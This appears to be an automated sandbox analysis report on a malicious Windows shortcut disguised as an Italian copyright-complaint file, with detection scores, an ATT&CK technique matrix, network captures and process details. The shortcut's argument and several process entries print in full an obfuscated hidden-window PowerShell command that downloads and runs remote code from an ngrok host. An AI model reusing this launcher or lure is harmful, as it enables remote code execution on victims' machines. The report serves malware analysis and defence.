Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5239Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4387Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4784Thread sleep count: 5239 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep count: 4387 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6704Thread sleep time: -16602069666338586s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6732Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
PowerShell
1
DLL Side-Loading
11
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping11
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
11
Process Injection
LSASS Memory21
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets11
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk39%VirustotalBrowse
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk18%ReversingLabsShortcut.Trojan.Pantera
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
172.64.41.3
truefalse
    high
    5awvoe1sr8b6b5g9cfxz.ngrok.app
    3.6.115.182
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50betrue
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      3.6.115.182
      5awvoe1sr8b6b5g9cfxz.ngrok.appUnited States
      16509AMAZON-02USfalse
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1578153
      Start date and time:2024-12-19 10:40:19 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 2s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
      Run name:Potential for more IOCs and behavior
      Number of analysed new started processes analysed:41
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk
      Detection:MAL
      Classification:mal76.winLNK@4/3@2/1
      Cookbook Comments:
      • Found application associated with file extension: .lnk
      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 20.190.147.9, 20.190.177.85, 20.190.147.4, 20.190.147.7, 20.190.177.23, 20.190.177.84, 20.190.177.19, 20.190.177.149, 20.103.156.88, 104.70.121.192, 104.70.121.202, 23.218.208.109, 20.12.23.50, 20.199.58.43
      • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, fd.api.iris.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, tse1.mm.bing.net, ctldl.windowsupdate.com, aefd.nelreports.net, login.msa.msidentity.com, x1.c.lencr.org, login.live.com, th.bing.com, res.public.onecdn.static.microsoft, c.pki.goog
      • Not all processes where analyzed, report is missing behavior information
      TimeTypeDescription
      04:41:24API Interceptor29x Sleep call for process: powershell.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      3.6.115.182kuEfaZxkiY.exeGet hashmaliciousRedLineBrowse
      • 0.tcp.in.ngrok.io:17383/
      RN2vknsx6G.exeGet hashmaliciousRedLineBrowse
      • 0.tcp.in.ngrok.io:17440/
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      chrome.cloudflare-dns.compM3fQBuTLy.exeGet hashmaliciousVidarBrowse
      • 162.159.61.3
      tasktow.exeGet hashmaliciousUnknownBrowse
      • 172.64.41.3
      QIo3SytSZA.exeGet hashmaliciousVidarBrowse
      • 162.159.61.3
      R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
      • 172.64.41.3
      g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
      • 162.159.61.3
      H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
      • 162.159.61.3
      HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
      • 162.159.61.3
      ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
      • 162.159.61.3
      NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
      • 172.64.41.3
      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
      • 162.159.61.3
      5awvoe1sr8b6b5g9cfxz.ngrok.appRapporteer inbreuk op auteursrechten.lnk.d.lnkGet hashmaliciousUnknownBrowse
      • 3.125.102.39
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      AMAZON-02USpowerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
      • 184.77.160.143
      DeltaX.exeGet hashmaliciousUnknownBrowse
      • 54.230.112.122
      CROC000400 .pdfGet hashmaliciousUnknownBrowse
      • 108.158.75.106
      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
      • 35.167.216.68
      x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
      • 35.156.171.87
      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
      • 3.163.158.110
      x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
      • 3.248.220.130
      https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.euGet hashmaliciousHTMLPhisherBrowse
      • 13.227.8.47
      No context
      No context
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):1112
      Entropy (8bit):5.274891782812459
      Encrypted:false
      SSDEEP:24:3IjgyP9wjGo4KCcMRPtLgBD7KloSM9tdL4tTiKyHi90lh7:YcyP9Sn4LRBgJVSM9tdL4tTinHSch7
      MD5:FE0EE410DE64D38FDD74B37D63678D7B
      SHA1:31A9DE3CEAE5D9AFFBBA496AF8363770105EE587
      SHA-256:5A565128AD3C0EC5F71B96FB7D89363BFF2B5D0A1825180D489C3FB5EB4B024B
      SHA-512:88EE6D99FD437AE6331AC07E095D1572E6B4E863E82276F410EA42E7BAF28131A371029E5E14C1EEB5638B425C4E5C869DA4FF9CB44AEA883FDD054C3E3512C4
      Malicious:false
      Reputation:low
      Preview:@...e................................................@..........8...................c.O..O.4+m.........System.Numerics.H.....................C...}...>...... .Microsoft.PowerShell.ConsoleHost0...............P!..:..A..............System..4...............s...<.O.h....rv........System.Core.D.................`....A..R............System.Management.AutomationL.................G(*.OK.w..h..*......#.Microsoft.Management.Infrastructure.4...............F.I..^.M._. ..}........System.Xml..<...................g..C.&..3.e.........System.Management...@...............l...52O.Rt...%.........System.DirectoryServices<.................&cb.1B.u`.)...........System.Configuration4...............Y.].s.N.....P........System.Data.H.................R....G.&'Hx-.P........Microsoft.PowerShell.Security...<...............Y.O.;b.D..8IJ...........System.Transactions.P.................u 6Z.L....A.X;......%.Microsoft.PowerShell.Commands.Utility...D...............c\....RG.5..q./........System.Configuration.Ins
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Reputation:high, very likely benign file
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Reputation:high, very likely benign file
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
      Entropy (8bit):3.7223232228578276
      TrID:
      • Windows Shortcut (20020/1) 100.00%
      File name:File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk
      File size:2'590 bytes
      MD5:3c56fd0e1bbabcfdeaabe5ee6e29bfa7
      SHA1:1376441bc8171553125dac0415240a81859ee8f7
      SHA256:0c64dd1718afa8b2cceb2727a322ddb14f595b29426c0c018a2231e61a73f6e5
      SHA512:e9a8df752694ca6d184c480beb27d12a2f48f1b7d084b7372ec8387046db47fb7e84fd048fb1fe3a32ad63e0454345febc6d3a32b176d20d281c0388b60835e7
      SSDEEP:48:8GIgax4PsU/rJETWap8irXBblgGd0lL4XuH4Xv3SsgoQYk:8fgaxEs2rWTWauiFhgdl2uWvZg5Y
      TLSH:5D51BF252BD91734F3B74E754976A2519A7AB946BC224F1D408042480C62B19EC75F2B
      File Content Preview:L..................F.@.. ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......
      Icon Hash:72d282828e8d8dd4

      General

      Relative Path:..\..\..\..\Windows\System32\cmd.exe
      Command Line Argument:/c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
      Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      TimestampSource PortDest PortSource IPDest IP
      Dec 19, 2024 10:41:25.734482050 CET49780443192.168.2.243.6.115.182
      Dec 19, 2024 10:41:25.734569073 CET443497803.6.115.182192.168.2.24
      Dec 19, 2024 10:41:25.734663963 CET49780443192.168.2.243.6.115.182
      Dec 19, 2024 10:41:25.749243975 CET49780443192.168.2.243.6.115.182
      Dec 19, 2024 10:41:25.749281883 CET443497803.6.115.182192.168.2.24
      Dec 19, 2024 10:41:27.358264923 CET443497803.6.115.182192.168.2.24
      Dec 19, 2024 10:41:27.359940052 CET49780443192.168.2.243.6.115.182
      Dec 19, 2024 10:41:27.359980106 CET443497803.6.115.182192.168.2.24
      Dec 19, 2024 10:41:27.360872984 CET443497803.6.115.182192.168.2.24
      Dec 19, 2024 10:41:27.360955954 CET49780443192.168.2.243.6.115.182
      Dec 19, 2024 10:41:27.369512081 CET49780443192.168.2.243.6.115.182
      Dec 19, 2024 10:41:27.369595051 CET443497803.6.115.182192.168.2.24
      Dec 19, 2024 10:41:27.457127094 CET49780443192.168.2.243.6.115.182
      Dec 19, 2024 10:41:27.457154989 CET443497803.6.115.182192.168.2.24
      Dec 19, 2024 10:41:27.584753990 CET49780443192.168.2.243.6.115.182
      Dec 19, 2024 10:41:28.107464075 CET443497803.6.115.182192.168.2.24
      Dec 19, 2024 10:41:28.107520103 CET443497803.6.115.182192.168.2.24
      Dec 19, 2024 10:41:28.107724905 CET49780443192.168.2.243.6.115.182
      Dec 19, 2024 10:41:28.118735075 CET49780443192.168.2.243.6.115.182
      TimestampSource PortDest PortSource IPDest IP
      Dec 19, 2024 10:41:15.875612974 CET6416353192.168.2.241.1.1.1
      Dec 19, 2024 10:41:16.012422085 CET53641631.1.1.1192.168.2.24
      Dec 19, 2024 10:41:25.484951019 CET6005853192.168.2.241.1.1.1
      Dec 19, 2024 10:41:25.719614983 CET53600581.1.1.1192.168.2.24
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Dec 19, 2024 10:41:15.875612974 CET192.168.2.241.1.1.10x12d6Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
      Dec 19, 2024 10:41:25.484951019 CET192.168.2.241.1.1.10xa738Standard query (0)5awvoe1sr8b6b5g9cfxz.ngrok.appA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Dec 19, 2024 10:41:16.012422085 CET1.1.1.1192.168.2.240x12d6No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
      Dec 19, 2024 10:41:16.012422085 CET1.1.1.1192.168.2.240x12d6No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
      Dec 19, 2024 10:41:25.719614983 CET1.1.1.1192.168.2.240xa738No error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.115.182A (IP address)IN (0x0001)false
      Dec 19, 2024 10:41:25.719614983 CET1.1.1.1192.168.2.240xa738No error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.98.232A (IP address)IN (0x0001)false
      Dec 19, 2024 10:41:25.719614983 CET1.1.1.1192.168.2.240xa738No error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.30.85A (IP address)IN (0x0001)false
      Dec 19, 2024 10:41:25.719614983 CET1.1.1.1192.168.2.240xa738No error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.115.64A (IP address)IN (0x0001)false
      Dec 19, 2024 10:41:25.719614983 CET1.1.1.1192.168.2.240xa738No error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.6.122.107A (IP address)IN (0x0001)false
      • 5awvoe1sr8b6b5g9cfxz.ngrok.app
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.24497803.6.115.1824432468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      2024-12-19 09:41:27 UTC218OUTGET /api/secure/dbd47cba3990bb15d4c46069a75f50be HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.22621.4111
      Host: 5awvoe1sr8b6b5g9cfxz.ngrok.app
      Connection: Keep-Alive
      2024-12-19 09:41:28 UTC162INHTTP/1.1 404 Not Found
      Connection: close
      Content-Type: text/plain
      Ngrok-Error-Code: ERR_NGROK_3200
      Date: Thu, 19 Dec 2024 09:41:27 GMT
      Content-Length: 67
      2024-12-19 09:41:28 UTC67INData Raw: 54 75 6e 6e 65 6c 20 35 61 77 76 6f 65 31 73 72 38 62 36 62 35 67 39 63 66 78 7a 2e 6e 67 72 6f 6b 2e 61 70 70 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a 0d 0a 45 52 52 5f 4e 47 52 4f 4b 5f 33 32 30 30 0d 0a
      Data Ascii: Tunnel 5awvoe1sr8b6b5g9cfxz.ngrok.app not foundERR_NGROK_3200


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:1
      Start time:04:41:20
      Start date:19/12/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
      Imagebase:0x7ff6547e0000
      File size:323'584 bytes
      MD5 hash:428CEC6B0034E0F183EB5BAE887BE480
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Target ID:2
      Start time:04:41:20
      Start date:19/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6038b0000
      File size:1'040'384 bytes
      MD5 hash:9698384842DA735D80D278A427A229AB
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:3
      Start time:04:41:21
      Start date:19/12/2024
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
      Imagebase:0x7ff7dbf70000
      File size:450'560 bytes
      MD5 hash:9D8E30DAF21108092D5980C931876B7E
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      No disassembly